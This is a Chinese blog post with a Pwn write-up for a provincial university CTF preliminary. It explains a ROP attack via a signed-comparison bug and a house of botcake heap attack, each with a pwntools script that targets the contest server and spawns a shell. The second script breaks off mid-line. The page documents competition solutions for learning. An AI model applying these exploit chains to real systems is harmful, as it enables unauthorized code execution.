<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>第八届浙江省大学生网络与信息安全竞赛技能赛预赛Pwn方向题解 | 晚栀winegee~</title>

  <!-- keywords -->
  

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="引言： 第八届浙江省大学生网络与信息安全竞赛技能赛预赛Pwn方向题解，也是两个小时ak了预赛的三道Pwn赛题，感谢carry@ZJUCSA师傅的rop题解">
<meta property="og:type" content="article">
<meta property="og:title" content="第八届浙江省大学生网络与信息安全竞赛技能赛预赛Pwn方向题解">
<meta property="og:url" content="https://wing3e.github.io/2025/11/09/%E6%B5%99%E6%B1%9F%E7%9C%81%E7%9C%81%E8%B5%9Bs8/index.html">
<meta property="og:site_name" content="晚栀winegee~">
<meta property="og:description" content="引言： 第八届浙江省大学生网络与信息安全竞赛技能赛预赛Pwn方向题解，也是两个小时ak了预赛的三道Pwn赛题，感谢carry@ZJUCSA师傅的rop题解">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://wing3e.github.io/2025/11/09/%E6%B5%99%E6%B1%9F%E7%9C%81%E7%9C%81%E8%B5%9Bs8/image-4.png">
<meta property="og:image" content="https://wing3e.github.io/2025/11/09/%E6%B5%99%E6%B1%9F%E7%9C%81%E7%9C%81%E8%B5%9Bs8/image-5.png">
<meta property="og:image" content="https://wing3e.github.io/2025/11/09/%E6%B5%99%E6%B1%9F%E7%9C%81%E7%9C%81%E8%B5%9Bs8/image.png">
<meta property="og:image" content="https://wing3e.github.io/2025/11/09/%E6%B5%99%E6%B1%9F%E7%9C%81%E7%9C%81%E8%B5%9Bs8/image-20251108155901905.png">
<meta property="og:image" content="https://wing3e.github.io/2025/11/09/%E6%B5%99%E6%B1%9F%E7%9C%81%E7%9C%81%E8%B5%9Bs8/image-20251108160027002.png">
<meta property="og:image" content="https://wing3e.github.io/2025/11/09/%E6%B5%99%E6%B1%9F%E7%9C%81%E7%9C%81%E8%B5%9Bs8/image-20251108160141115.png">
<meta property="og:image" content="https://wing3e.github.io/2025/11/09/%E6%B5%99%E6%B1%9F%E7%9C%81%E7%9C%81%E8%B5%9Bs8/image-20251108161044512.png">
<meta property="og:image" content="https://wing3e.github.io/2025/11/09/%E6%B5%99%E6%B1%9F%E7%9C%81%E7%9C%81%E8%B5%9Bs8/image-20251108155153703.png">
<meta property="og:image" content="https://wing3e.github.io/2025/11/09/%E6%B5%99%E6%B1%9F%E7%9C%81%E7%9C%81%E8%B5%9Bs8/image-20251108155250077.png">
<meta property="og:image" content="https://wing3e.github.io/2025/11/09/%E6%B5%99%E6%B1%9F%E7%9C%81%E7%9C%81%E8%B5%9Bs8/image-20251108160626911.png">
<meta property="article:published_time" content="2025-11-09T15:04:06.000Z">
<meta property="article:modified_time" content="2025-11-09T15:17:01.362Z">
<meta property="article:tag" content="Pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://wing3e.github.io/2025/11/09/%E6%B5%99%E6%B1%9F%E7%9C%81%E7%9C%81%E8%B5%9Bs8/image-4.png">
  
    <link rel="alternative" href="/atom.xml" title="晚栀winegee~" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/avatar.jpg">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  

  
<script src="//cdn.bootcss.com/require.js/2.3.2/require.min.js"></script>

  
<script src="//cdn.bootcss.com/jquery/3.1.1/jquery.min.js"></script>


  
<meta name="generator" content="Hexo 7.0.0"><style>mjx-container[jax="SVG"] {
  direction: ltr;
}

mjx-container[jax="SVG"] > svg {
  overflow: visible;
}

mjx-container[jax="SVG"][display="true"] {
  display: block;
  text-align: center;
  margin: 1em 0;
}

mjx-container[jax="SVG"][justify="left"] {
  text-align: left;
}

mjx-container[jax="SVG"][justify="right"] {
  text-align: right;
}

g[data-mml-node="merror"] > g {
  fill: red;
  stroke: red;
}

g[data-mml-node="merror"] > rect[data-background] {
  fill: yellow;
  stroke: none;
}

g[data-mml-node="mtable"] > line[data-line] {
  stroke-width: 70px;
  fill: none;
}

g[data-mml-node="mtable"] > rect[data-frame] {
  stroke-width: 70px;
  fill: none;
}

g[data-mml-node="mtable"] > .mjx-dashed {
  stroke-dasharray: 140;
}

g[data-mml-node="mtable"] > .mjx-dotted {
  stroke-linecap: round;
  stroke-dasharray: 0,140;
}

g[data-mml-node="mtable"] > svg {
  overflow: visible;
}

[jax="SVG"] mjx-tool {
  display: inline-block;
  position: relative;
  width: 0;
  height: 0;
}

[jax="SVG"] mjx-tool > mjx-tip {
  position: absolute;
  top: 0;
  left: 0;
}

mjx-tool > mjx-tip {
  display: inline-block;
  padding: .2em;
  border: 1px solid #888;
  font-size: 70%;
  background-color: #F8F8F8;
  color: black;
  box-shadow: 2px 2px 5px #AAAAAA;
}

g[data-mml-node="maction"][data-toggle] {
  cursor: pointer;
}

mjx-status {
  display: block;
  position: fixed;
  left: 1em;
  bottom: 1em;
  min-width: 25%;
  padding: .2em .4em;
  border: 1px solid #888;
  font-size: 90%;
  background-color: #F8F8F8;
  color: black;
}

foreignObject[data-mjx-xml] {
  font-family: initial;
  line-height: normal;
  overflow: visible;
}

.MathJax path {
  stroke-width: 3;
}

mjx-container[display="true"] {
  overflow: auto hidden;
}

mjx-container[display="true"] + br {
  display: none;
}
</style></head>
<body>
  <div id="container">
    <div id="particles-js"></div>
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
	<header id="header" class="inner">
		<a href="/" class="profilepic">
			
				<img lazy-src="/img/avatar.jpg" class="js-avatar">
			
		</a>

		<hgroup>
			<h1 class="header-author"><a href="/"></a></h1>
		</hgroup>

		

		<div class="switch-area">
			<div class="switch-wrap">
				<section class="switch-part switch-part1">
					<nav class="header-menu">
						<ul>
						
							<li><a href="/">Home</a></li>
				        
							<li><a href="/archives">Archives</a></li>
				        
							<li><a href="/tags">Tags</a></li>
				        
							<li><a href="/introduction">About me</a></li>
				        
							<li><a href="/poetry">Winegee的书房</a></li>
				        
							<li><a href="/log">Maintenance log</a></li>
				        
						</ul>
					</nav>
					<nav class="half-header-menu">
						<a class="hide">Home</a>
						<a>Tags</a>
						<a>Links</a>
						<a>About</a>
					</nav>
					<nav class="header-nav">
						<div class="social">
							
								<a class="github" target="_blank" href="https://github.com/wing3e" title="github">github</a>
					        
								<a class="weibo" target="_blank" href="#" title="weibo">weibo</a>
					        
						</div>
						<!-- music -->
						
							<!-- <div style="position: absolute; bottom: 120px; left: auto; width: 85%;"> -->
							<div style="position: absolute; left: auto; width: 85%;">
								<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=220 height=86 src="//music.163.com/outchain/player?type=2&id=1805347343&auto=1&height=66"></iframe>
							</div>
						
					</nav>
				</section>
				
				
				<section class="switch-part switch-part2">
					<div class="widget tagcloud" id="js-tagcloud">
						<a href="/tags/BeginCTF/" style="font-size: 10px;">BeginCTF</a> <a href="/tags/CAN-IDS/" style="font-size: 10px;">CAN-IDS</a> <a href="/tags/CTF/" style="font-size: 12px;">CTF</a> <a href="/tags/MoeCTF/" style="font-size: 10px;">MoeCTF</a> <a href="/tags/Pwn/" style="font-size: 20px;">Pwn</a> <a href="/tags/Reverse/" style="font-size: 12px;">Reverse</a> <a href="/tags/ZJUCTF/" style="font-size: 12px;">ZJUCTF</a> <a href="/tags/eBPF/" style="font-size: 10px;">eBPF</a> <a href="/tags/pwn/" style="font-size: 10px;">pwn</a> <a href="/tags/%E4%BF%A1%E6%81%AF%E7%90%86%E8%AE%BA/" style="font-size: 10px;">信息理论</a> <a href="/tags/%E5%A0%86%E5%88%A9%E7%94%A8/" style="font-size: 12px;">堆利用</a> <a href="/tags/%E5%AE%89%E6%B4%B5%E6%9D%AF/" style="font-size: 10px;">安洵杯</a> <a href="/tags/%E5%AF%86%E7%A0%81%E5%AD%A6/" style="font-size: 10px;">密码学</a> <a href="/tags/%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F/" style="font-size: 14px;">操作系统</a> <a href="/tags/%E6%95%B0%E5%AD%A6%E5%BB%BA%E6%A8%A1/" style="font-size: 16px;">数学建模</a> <a href="/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%BD%93%E7%B3%BB%E7%BB%93%E6%9E%84/" style="font-size: 12px;">计算机体系结构</a> <a href="/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%B3%BB%E7%BB%9FII/" style="font-size: 18px;">计算机系统II</a> <a href="/tags/%E8%BD%A6%E8%81%94%E7%BD%91/" style="font-size: 10px;">车联网</a>
					</div>
				</section>
				
				
				
				<section class="switch-part switch-part3">
					<div id="js-friends">
					
			          <a target="_blank" class="main-nav-link switch-friends-link" href="https://note.jiepeng.tech/">JPGG&#39;s NoteBook</a>
			        
			          <a target="_blank" class="main-nav-link switch-friends-link" href="http://47.99.33.238/">Tauhkc&#39;s Note</a>
			        
			          <a target="_blank" class="main-nav-link switch-friends-link" href="https://xymmsnotebook.gitbook.io/noteofxymm/">xy猫猫</a>
			        
			          <a target="_blank" class="main-nav-link switch-friends-link" href="https://zjuccnocc.github.io/Home">CCnocc</a>
			        
			          <a target="_blank" class="main-nav-link switch-friends-link" href="https://hzeroyuke.github.io/my_blog/">华零的Notebook</a>
			        
			          <a target="_blank" class="main-nav-link switch-friends-link" href="http://miraclemaster.cn/">恩浩gg</a>
			        
			          <a target="_blank" class="main-nav-link switch-friends-link" href="http://116.62.208.33/">SLXjj没想好标题</a>
			        
			          <a target="_blank" class="main-nav-link switch-friends-link" href="https://zjulwind.github.io/home/">ZY老师</a>
			        
			        </div>
				</section>
				

				
				
				<section class="switch-part switch-part4">
				
					<div id="js-aboutme">aaa</div>
				</section>
				
			</div>
		</div>
	</header>				
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
  	<div class="overlay">
  		<div class="slider-trigger"></div>
  		<h1 class="header-author js-mobile-header hide"></h1>
  	</div>
	<div class="intrude-less">
		<header id="header" class="inner">
			<div class="profilepic">
				<img lazy-src="/img/avatar.jpg" class="js-avatar">
			</div>
			<hgroup>
			  <h1 class="header-author"></h1>
			</hgroup>
			
			<nav class="header-menu">
				<ul>
				
					<li><a href="/">Home</a></li>
		        
					<li><a href="/archives">Archives</a></li>
		        
					<li><a href="/tags">Tags</a></li>
		        
					<li><a href="/introduction">About me</a></li>
		        
					<li><a href="/poetry">Winegee的书房</a></li>
		        
					<li><a href="/log">Maintenance log</a></li>
		        
		        <div class="clearfix"></div>
				</ul>
			</nav>
			<nav class="header-nav">
				<div class="social">
					
						<a class="github" target="_blank" href="https://github.com/wing3e" title="github">github</a>
			        
						<a class="weibo" target="_blank" href="#" title="weibo">weibo</a>
			        
				</div>
			</nav>
		</header>				
	</div>
</nav>
      <div class="body-wrap"><article id="post-浙江省省赛s8" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2025/11/09/%E6%B5%99%E6%B1%9F%E7%9C%81%E7%9C%81%E8%B5%9Bs8/" class="article-date">
  	<time datetime="2025-11-09T15:04:06.000Z" itemprop="datePublished">2025-11-09</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      第八届浙江省大学生网络与信息安全竞赛技能赛预赛Pwn方向题解
      
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
	<div class="article-tag tagcloud">
		<ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Pwn/" rel="tag">Pwn</a></li></ul>
	</div>

        

        
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
        <script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>
<h3 id="引言">引言：</h3>
<p><strong>第八届浙江省大学生网络与信息安全竞赛</strong>技能赛预赛Pwn方向题解，也是两个小时ak了预赛的三道Pwn赛题，感谢carry@ZJUCSA师傅的rop题解</p>
<span id="more"></span>
<h2 id="pwn">pwn</h2>
<h3 id="rop-carry">rop <span class="citation" data-cites="carry">@carry</span></h3>
<p>观察代码，刚开始没发现问题，不存在栈溢出，但是题目又说了是ROP，肯定跟返回地址有关 在观察output的代码时，发现</p>
<p><img src="/2025/11/09/%E6%B5%99%E6%B1%9F%E7%9C%81%E7%9C%81%E8%B5%9Bs8/image-4.png"></p>
<p>jle是有符号是比较，所以我尝试了一下output(-1)会怎么样，结果打印出返回地址后就segment default，看到是output会将打印出来的清零，所以我们可以通过output去打印出一些栈信息来泄露libc，经过尝试，output(-15)会打印出libc地址 ，即_IO_2_1_stdout_的地址，于是通过这个来泄露libc，随后发现，-1是返回地址的位置，而input会根据目前有的来写入，所以我们写一个正常的返回地址回去，因为没开pie所以返回地址好找，随后就可以写 binsh_addr system_addr了，最后通过无意义的3个output将a1+72的值拉回去，</p>
<p><img src="/2025/11/09/%E6%B5%99%E6%B1%9F%E7%9C%81%E7%9C%81%E8%B5%9Bs8/image-5.png"></p>
<p>最后修改返回地址为pop_rdi_ret的返回地址，结果炸了，随后想到是栈指针没对齐，所以改成返回地址为ret_addr,后续的链子是pop_rdi_ret,binsh_addr,system_addr,拿下</p>
<p><img src="/2025/11/09/%E6%B5%99%E6%B1%9F%E7%9C%81%E7%9C%81%E8%B5%9Bs8/image.png"></p>
<p>payload如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line">def input(msg):</span><br><span class="line">    p.recvuntil(<span class="string">"&gt;&gt;"</span>)</span><br><span class="line">    p.sendline(b<span class="string">"1"</span>)</span><br><span class="line">    p.recvuntil(<span class="string">"number"</span>)</span><br><span class="line">    p.sendline(msg)</span><br><span class="line">def output(index):</span><br><span class="line">    p.recvuntil(<span class="string">"&gt;&gt;"</span>)</span><br><span class="line">    p.sendline(b<span class="string">"2"</span>)</span><br><span class="line">    p.recvuntil(<span class="string">"index"</span>)</span><br><span class="line">    p.sendline(str(index).encode())</span><br><span class="line">choice=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span>(choice):</span><br><span class="line">    <span class="meta"># gdbscript=<span class="string">""</span><span class="string">"</span></span></span><br><span class="line"><span class="string"><span class="meta">    # b *0x4013df</span></span></span><br><span class="line"><span class="string"><span class="meta">    # #b *0x401339</span></span></span><br><span class="line"><span class="string"><span class="meta">    # c</span></span></span><br><span class="line"><span class="string"><span class="meta">    # b printf</span></span></span><br><span class="line"><span class="string"><span class="meta">    # c</span></span></span><br><span class="line"><span class="string"><span class="meta">    # finish</span></span></span><br><span class="line"><span class="string"><span class="meta">    # "</span><span class="string">""</span></span></span><br><span class="line">    gdbscript=<span class="string">""</span><span class="string">"</span></span><br><span class="line"><span class="string">    b *0x401339</span></span><br><span class="line"><span class="string">    c</span></span><br><span class="line"><span class="string">    "</span><span class="string">""</span></span><br><span class="line">    p=gdb.debug(<span class="string">"./pwn"</span>,gdbscript=gdbscript)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    p=remote(<span class="string">'45.40.247.139'</span>,<span class="number">20164</span>)</span><br><span class="line"></span><br><span class="line">output(<span class="number">-15</span>)</span><br><span class="line">p.recvuntil(b<span class="string">"number:\n"</span>)</span><br><span class="line">s=<span class="type">int</span>(p.recvline().strip())</span><br><span class="line">print(s)</span><br><span class="line">print(hex(s))</span><br><span class="line">libc=ELF(<span class="string">"./libc-2.31.so"</span>)</span><br><span class="line">libcbase=s-libc.sym[<span class="string">"_IO_2_1_stdout_"</span>]</span><br><span class="line">pop_rdi=libc.search(<span class="keyword">asm</span>(<span class="string">"pop rdi; ret"</span>)).__next__()+libcbase</span><br><span class="line">print(<span class="string">"find"</span>,hex(pop_rdi))</span><br><span class="line">system=libc.sym[<span class="string">"system"</span>]+libcbase</span><br><span class="line">binsh=next(libc.search(b<span class="string">"/bin/sh\x00"</span>))+libcbase</span><br><span class="line">print(hex(libcbase))</span><br><span class="line">payload1=b<span class="string">"4199690"</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#output(-12)</span></span><br><span class="line">input(payload1)</span><br><span class="line">input(str(pop_rdi).encode())</span><br><span class="line">input(str(binsh).encode())</span><br><span class="line">input(str(system).encode())</span><br><span class="line">output(<span class="number">-15</span>)</span><br><span class="line">output(<span class="number">-15</span>)</span><br><span class="line">output(<span class="number">-15</span>)</span><br><span class="line">output(<span class="number">-15</span>)</span><br><span class="line">print(<span class="string">"pop rdi:"</span>,hex(pop_rdi))</span><br><span class="line">print(<span class="string">"system:"</span>,hex(system))</span><br><span class="line">print(<span class="string">"/bin/sh:"</span>,hex(binsh))</span><br><span class="line">input(str(pop_rdi+<span class="number">1</span>).encode())</span><br><span class="line"></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">input(payload2)</span><br><span class="line">output(<span class="number">-1</span>)</span><br><span class="line"><span class="string">'''</span></span><br><span class="line">p.interactive()</span><br><span class="line"># <span class="number">0x7fffc3f58060</span></span><br></pre></td></tr></table></figure>
<h3 id="bad_heap-winegee">bad_heap <span class="citation" data-cites="Winegee">@Winegee</span></h3>
<p>拿了个一血QwQ</p>
<p>glibc 2.35</p>
<p>一个常规增删改查，在add里有对申请出的堆块的限制</p>
<p><img src="/2025/11/09/%E6%B5%99%E6%B1%9F%E7%9C%81%E7%9C%81%E8%B5%9Bs8/image-20251108155901905.png"></p>
<p>也就是申请出来的堆块不能在libc段，最开始想打tls_dtor_list劫持exit，但是试了试发现这个地址每次不固定，很难打</p>
<p>之后看了下这个lib段限制：</p>
<p><img src="/2025/11/09/%E6%B5%99%E6%B1%9F%E7%9C%81%E7%9C%81%E8%B5%9Bs8/image-20251108160027002.png"></p>
<p>试了一下<code>__environ</code>在不在这个段内，发现不在，也就是这玩应根本没限制全，lib段没这么小，所以我们可以申请到<code>__environ</code>去泄露栈地址，最后打一个栈上的rop。</p>
<p>看一眼程序，有add，delete，show没有edit，而且free里面有一个uaf</p>
<p><img src="/2025/11/09/%E6%B5%99%E6%B1%9F%E7%9C%81%E7%9C%81%E8%B5%9Bs8/image-20251108160141115.png"></p>
<p>申请八个堆块，free 七个，再free第八个，第八个就会掉入unsorted bin ，泄露libc。</p>
<p>常规打法house of botcake</p>
<p>先申请九个堆块，把1-7堆块free掉填满一条tcache bin链子，接着把8,9 free掉，8,9堆块就会都掉入unsorted bin并且发生合并，这时候9号堆块里面的指针什么的就会被清空，此时再申请一个堆块，tcache bin链子上就会出一个空位，再把9号堆块free掉，就会造成9号堆块同时在unsorted bin和tcache bin中，此时再申请一个稍微大一点的堆块就会发生unsorted bin的切割，就可以覆盖到9号堆块的fd指针，造成任意地址申请。</p>
<p>2.35下还需要提前泄露heap addr，这个free再add回来就可以泄露了。</p>
<p>本题exp如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> struct <span class="keyword">import</span> pack</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">s</span>(<span class="params">a</span>):</span><br><span class="line">    p.send(a)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">sa</span>(<span class="params">a, b</span>):</span><br><span class="line">    p.sendafter(a, b)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">sl</span>(<span class="params">a</span>):</span><br><span class="line">    p.sendline(a)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">sla</span>(<span class="params">a, b</span>):</span><br><span class="line">    p.sendlineafter(a, b)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">r</span>():</span><br><span class="line">    p.recv()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">pr</span>():</span><br><span class="line">    <span class="built_in">print</span>(p.recv())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">rl</span>(<span class="params">a</span>):</span><br><span class="line">    <span class="keyword">return</span> p.recvuntil(a)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">inter</span>():</span><br><span class="line">    p.interactive()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">debug</span>():</span><br><span class="line">    gdb.attach(p)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#    pause()</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_addr</span>():</span><br><span class="line">    <span class="keyword">return</span> u64(p.recvuntil(<span class="string">b'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>, <span class="string">b'\x00'</span>))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_sb</span>():</span><br><span class="line">    <span class="keyword">return</span> libc_base + libc.sym[<span class="string">'system'</span>], libc_base + <span class="built_in">next</span>(libc.search(<span class="string">b'/bin/sh\x00'</span>))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">context(os=<span class="string">'linux'</span>, arch=<span class="string">'amd64'</span>, log_level=<span class="string">'debug'</span>)</span><br><span class="line"></span><br><span class="line">p = process(<span class="string">'./pwn'</span>)</span><br><span class="line">p = remote(<span class="string">"45.40.247.139"</span>, <span class="number">15222</span>)</span><br><span class="line"><span class="comment"># libc = ELF("./libc.so.6")</span></span><br><span class="line">libc = ELF(<span class="string">"/lib/x86_64-linux-gnu/libc.so.6"</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">idx, size, content</span>):</span><br><span class="line">    sla(<span class="string">b"inputs your choice:"</span>, <span class="built_in">str</span>(<span class="number">1</span>))</span><br><span class="line">    sla(<span class="string">b"input idx:"</span>, <span class="built_in">str</span>(idx))</span><br><span class="line">    sla(<span class="string">b"input size:"</span>, <span class="built_in">str</span>(size))</span><br><span class="line">    sa(<span class="string">b"input content:"</span>, content)</span><br><span class="line">    </span><br><span class="line">    </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params">idx</span>):</span><br><span class="line">    sla(<span class="string">b"inputs your choice:"</span>, <span class="built_in">str</span>(<span class="number">2</span>))</span><br><span class="line">    sla(<span class="string">b"input idx:"</span>, <span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>(<span class="params">idx</span>):</span><br><span class="line">    sla(<span class="string">b"inputs your choice:"</span>, <span class="built_in">str</span>(<span class="number">3</span>))</span><br><span class="line">    sla(<span class="string">b"input idx:"</span>, <span class="built_in">str</span>(idx))</span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>, <span class="number">0x80</span>, <span class="string">b'a'</span>*<span class="number">8</span>)</span><br><span class="line">add(<span class="number">1</span>, <span class="number">0x80</span>, <span class="string">b'b'</span>*<span class="number">8</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">p.recv()</span><br><span class="line">heap_base = u64(p.recv(<span class="number">5</span>).ljust(<span class="number">8</span>, <span class="string">b'\x00'</span>)) &lt;&lt; <span class="number">12</span></span><br><span class="line">success(<span class="string">"heap_base: "</span> + <span class="built_in">hex</span>(heap_base))</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">9</span>):</span><br><span class="line">    add(i, <span class="number">0x80</span>, <span class="string">b'a'</span>*<span class="number">8</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    delete(i)</span><br><span class="line">    </span><br><span class="line">delete(<span class="number">7</span>)</span><br><span class="line">show(<span class="number">7</span>)</span><br><span class="line">p.recv()</span><br><span class="line">libc_base = u64(p.recv(<span class="number">6</span>).ljust(<span class="number">8</span>, <span class="string">b'\x00'</span>)) - (<span class="number">0x73f88041ace0</span> - <span class="number">0x73f880200000</span>)</span><br><span class="line">success(<span class="string">"libc_base: "</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line">tls_dtor_list = libc_base + (<span class="number">0x783e97be26e8</span> - <span class="number">0x783e97800000</span>) - <span class="number">8</span></span><br><span class="line">environ = libc_base + libc.sym[<span class="string">'__environ'</span>] - <span class="number">0x10</span></span><br><span class="line">success(<span class="string">"tls_dtor_list: "</span> + <span class="built_in">hex</span>(tls_dtor_list))</span><br><span 